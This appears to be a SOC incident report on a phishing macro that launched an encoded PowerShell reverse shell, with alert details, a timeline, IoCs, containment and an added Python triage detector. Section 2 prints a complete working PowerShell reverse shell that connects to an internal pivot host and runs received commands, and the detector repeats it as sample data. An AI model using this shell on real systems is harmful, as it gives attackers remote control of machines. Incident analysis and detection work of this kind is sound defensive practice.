T1059 – Command & Scripting Interpreter (CrowdStrike Detection)

CrowdStrike Alert Details

Alert ID: CS-POWERSHELL-1059-7842
Alert Time: 2024-02-13 10:22:15 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious PowerShell Command Line – Encoded Execution”
MITRE ATT&CK: T1059.001 – Command & Scripting Interpreter: PowerShell

Alert Details:

Detection: PowerShell executed with encoded command and hidden window

Host: FIN-WS-045 (Finance Department)

User: bturner (Brian Turner, Accountant)

Time: 10:18 EST

Process Tree:

– explorer.exe (PID: 3421)

  – powershell.exe (PID: 4789)

    – Command Line: powershell.exe -NoP -NonI -W Hidden -Enc <base64 blob omitted>

Decoded Command:

– Reverse shell to 192.168.45.12:443

– Interactive PowerShell session

– Masquerading as normal process

Network Connection:

– Destination: 192.168.45.12:443 (Internal IP – Unusual)

– Protocol: TCP

– Status: Established at 10:19 EST

Additional Context:

– User bturner normally does not use PowerShell

– Parent process explorer.exe (unusual for PowerShell)

– Encoded command is base64 for reverse shell

SOC Investigation Process

Step | Action | Tools Used | Findings
1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed malicious PowerShell execution
2. Command Decoding | Decode base64 command | PowerShell, CyberChef | Reverse shell to internal IP 192.168.45.12
3. Immediate Containment | Isolate host | CrowdStrike Network Containment | Host isolated; process terminated
4. Destination Investigation | Identify 192.168.45.12 | Splunk, CMDB | IP belongs to ENG-WS-023 (compromised engineering workstation)
5. Second Host Isolation | Isolate C2 host | CrowdStrike | ENG-WS-023 isolated
6. User Interview | Contact both users | Phone, Teams | Both users unaware; malware identified

Jira Incident Report

Ticket: SOC-2024-066
Summary: T1059 – PowerShell Reverse Shell Execution from Finance Workstation
Status: RESOLVED
Resolution: MALICIOUS – C2 Communication Blocked
Priority: P1 – HIGH
Labels: T1059, powershell, command-interpreter, reverse-shell, crowdstrike
Components: Endpoint-Security, Incident-Response


INCIDENT ANALYSIS REPORT

1. Initial Context:

  • Detection Source: CrowdStrike Falcon EDR.
  • Alert: “Suspicious PowerShell Command Line – Encoded Execution”.
  • Host: FIN-WS-045 (Finance Department, user bturner).
  • Time: 2024-02-13 10:22 EST.
  • Technique: MITRE ATT&CK T1059.001 – Command & Scripting Interpreter: PowerShell.

2. Technical Analysis:

  • Command Analysis:
    – Encoded command base64 decoded to:

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.12',443);  # connect out to the internal pivot host on 443
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};                                           # 64 KB receive buffer
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){               # loop until the remote side closes the socket
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  $sendback = (iex $data 2>&1 | Out-String );                             # run received text as PowerShell, capture output and errors
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';                     # append a fake interactive prompt
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()
};
$client.Close()

  • Function: Reverse shell connecting to 192.168.45.12 on port 443
  • Capabilities: Full interactive PowerShell session for attacker
  • Attack Chain:
    1. User bturner opened phishing email attachment (Excel macro)
    2. Macro executed PowerShell with encoded command
    3. PowerShell established reverse shell to attacker-controlled internal host (ENG-WS-023)
    4. Attacker used engineering workstation as C2 pivot
  • C2 Infrastructure:
    – Primary C2: 192.168.45.12 (ENG-WS-023) – Internal pivot
    – External C2: 185.143.221[.]89 (from engineering host logs)
    – Method: Chained connection (Finance → Engineering → External)
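As an added example, not part of the original report and not CrowdStrike or CyberChef code: a Python triage helper that reproduces step 2 of the investigation (decoding the -Enc argument, which is base64 over UTF-16LE) and flags the socket-plus-iex pattern and the hidden-window switch the alert keyed on. The sample command line is constructed from the reverse shell shown above; names such as triage and INDICATORS are the example's own.

```python
import base64
import re
from typing import Optional

# Constructed sample, not the alert's real blob: the page's reverse shell core,
# encoded the way powershell.exe -Enc expects (UTF-16LE text, then base64).
SAMPLE_SCRIPT = ("$client = New-Object System.Net.Sockets.TCPClient('192.168.45.12',443);"
                 "$stream = $client.GetStream();"
                 "$sendback = (iex $data 2>&1 | Out-String);")
SAMPLE_CMDLINE = ("powershell.exe -NoP -NonI -W Hidden -Enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii"))

# -EncodedCommand accepts any unambiguous prefix, so match the common short forms too.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

# Script content an analyst treats as reverse-shell or loader behaviour.
INDICATORS = {
    "tcp_client": r"System\.Net\.Sockets\.TCPClient",
    "stream_io": r"\.GetStream\(\)",
    "invoke_expression": r"\biex\b|Invoke-Expression",
    "downloader": r"DownloadString|Net\.WebClient|Invoke-WebRequest",
}

def decode_encoded_command(cmdline: str) -> Optional[str]:
    # Returns the decoded script from a -Enc command line, or None if there is none.
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))  # tolerate stripped padding
    return raw.decode("utf-16le", errors="replace")

def extract_tcp_endpoints(script: str) -> list:
    # (host, port) pairs from TCPClient('host',port) constructor calls
    return re.findall(r"TCPClient\(\s*'([^']+)'\s*,\s*(\d+)\s*\)", script)

def triage(cmdline: str) -> dict:
    # Decode and score one command line the way step 2 of the investigation did.
    script = decode_encoded_command(cmdline)
    hidden = bool(HIDDEN_WINDOW.search(cmdline))
    hits = [name for name, pat in INDICATORS.items() if script and re.search(pat, script)]
    endpoints = extract_tcp_endpoints(script) if script else []
    # Socket plus iex in an encoded, hidden-window command is the full pattern from the alert.
    full_pattern = {"tcp_client", "invoke_expression"} <= set(hits)
    verdict = "reverse_shell" if full_pattern else ("suspicious" if hits or (script and hidden) else "benign")
    return {"encoded": script is not None, "hidden_window": hidden,
            "indicators": hits, "endpoints": endpoints, "verdict": verdict}
```

Running triage over the sample command line returns the decoded endpoint 192.168.45.12:443 and the verdict reverse_shell; a plain -Command invocation comes back benign.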

3. Investigation Findings:

  • Timeline:
    10:15 – User opens phishing email
    10:16 – Excel macro executes
    10:17 – PowerShell launches with encoded command
    10:18 – Reverse shell connects to ENG-WS-023
    10:19 – Connection established
    10:22 – CrowdStrike alert triggers
    10:23 – FIN-WS-045 isolated
    10:25 – ENG-WS-023 identified and isolated
  • Scope:
    – 2 hosts compromised
    – No lateral movement beyond these hosts
    – No data exfiltration detected
  • Indicators of Compromise (IoCs):
    Network:
    – Internal C2: 192.168.45.12:443
    – External C2: 185.143.221[.]89:443
    Files:
    – invoice_7823.xlsm (SHA256: a1b2c3…)
    – C:\Windows\Temp\svchost.exe (SHA256: d4e5f6…)
    Processes:
    – powershell.exe with encoded command

4. Containment Actions:

  • Immediate Actions:
    – Isolated both hosts via CrowdStrike.
    – Terminated malicious processes.
    – Blocked external C2 IP at firewall.
  • Forensic Collection:
    – Captured memory from both hosts.
    – Extracted macro and payloads.
    – Analyzed reverse shell traffic.
  • Remediation:
    – Re-imaged both workstations.
    – Reset user passwords.
    – Phishing awareness training for users.

5. Root Cause Analysis:

  • Primary Cause: Phishing email with malicious macro.
  • Contributing Factors:
  1. Macros enabled in Office.
  2. No ASR rule blocking Office child processes.
  3. Internal host used as C2 pivot (detected).

6. Business Impact:

  • Operational Impact: Two workstations offline for 4 hours.
  • Data Exposure: None (no exfiltration).

7. Remediation & Prevention:

Completed Actions:

  • Hosts remediated.
  • Users educated.
  • IOCs blocked.

Technical Controls Enhanced:

  • Enabled ASR rule “Block Office applications from creating child processes”.
  • Blocked macros from internet via GPO.
  • Enhanced PowerShell logging.

8. Conclusion:

Attackers used a phishing email with malicious macro to execute a PowerShell reverse shell, using an internal engineering workstation as a pivot. Rapid detection and containment prevented data exfiltration.

Closure Rationale: Hosts remediated; attacker blocked; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-13 12:00 EST
